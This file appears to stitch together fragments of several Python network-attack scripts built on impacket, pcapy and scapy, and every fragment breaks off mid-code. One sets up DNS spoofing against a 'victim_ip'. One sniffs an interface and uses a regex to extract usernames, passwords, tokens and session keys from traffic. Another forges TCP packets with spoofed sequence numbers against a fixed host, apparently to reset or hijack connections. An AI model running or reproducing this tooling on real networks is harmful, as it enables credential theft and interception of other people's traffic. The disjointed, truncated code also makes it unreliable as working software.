def decode(self, aBuffer): e = GRE(aBuffer) off = e.get_header_size() if e.get_ether_type() == ImpactPacket.IP.ethertype: self.ip_decoder = IPDecoder() packet = self.ip_decoder.decode(aBuffer[off:]) elif e.get_ether_type() == ImpactPacket.ARP.ethertype: self.arp_decoder = ARPDecoder() packet = self.arp_decoder.decode(aBuffer[off:]) else: self.data_decoder = DataDecoder() packet = self.data_decoder.decode(aBuffer[off:]) e.contains(packet) return e
def __init__(self): self.dev = "eth0" self.filt = "port 53" self.my_file= '/home/kevamo/Desktop/hosts' decoder = EthDecoder() self.dns_map = {} self.eth_decoder = EthDecoder() self.ip_decoder = IPDecoder() self.tcp_decoder = TCPDecoder() self.udp_decoder=UDPDecoder() #vriables to store target data self.victim_ip='' self.address_to_spoof='' self.self_fake_ip='' #sentinel to stop loop self.stop=''
import sys import re import getopt import pcapy from impacket.ImpactDecoder import EthDecoder, IPDecoder, TCPDecoder # Interface to sniff on dev = "enp3s0f1" # Pcap filter filter = "tcp" # Decoder for all layers eth_dec = EthDecoder() ip_dec = IPDecoder() tcp_dec = TCPDecoder() # Patterns that match usernames and passwords pattern = re.compile(r"""(?P<found>(USER|USERNAME|PASS| PASSWORD|LOGIN|BENUTZER|PASSWORT|AUTH| ACCESS|ACCESS_?KEY|SESSION| SESSION_?KEY|TOKEN)[=:\s].+)\b""", re.MULTILINE|re.IGNORECASE) # This function will be called for every packet, decode it and # try to find a username or password in it def handle_packet(hdr, data): eth_pkt = eth_dec.decode(data) ip_pkt = ip_dec.decode(eth_pkt.get_data_as_string())
#!/usr/bin/python import sys import getopt import pcapy from scapy.all import send, IP, TCP from impacket.ImpactDecoder import EthDecoder, IPDecoder from impacket.ImpactDecoder import TCPDecoder dev = "wlan0" filter = "" eth_decoder = EthDecoder() ip_decoder = IPDecoder() tcp_decoder = TCPDecoder() def handle_packet(hdr, data): eth = eth_decoder.decode(data) ip = ip_decoder.decode(eth.get_data_as_string()) tcp = tcp_decoder.decode(ip.get_data_as_string()) #print "source ip is ==>"+str(ip.get_ip_src()) print "dst is ==>" + str(ip.get_ip_dst()) if tcp.get_ACK() and str(ip.get_ip_dst()) == '192.168.100.5' or str( ip.get_ip_src()) == '192.168.100.5': print 'hurray=>' + str(tcp.get_ACK()) packet = IP(src=ip.get_ip_dst(), dst=ip.get_ip_src()) / TCP( sport=tcp.get_th_dport(), dport=tcp.get_th_sport(), seq=tcp.get_th_ack(),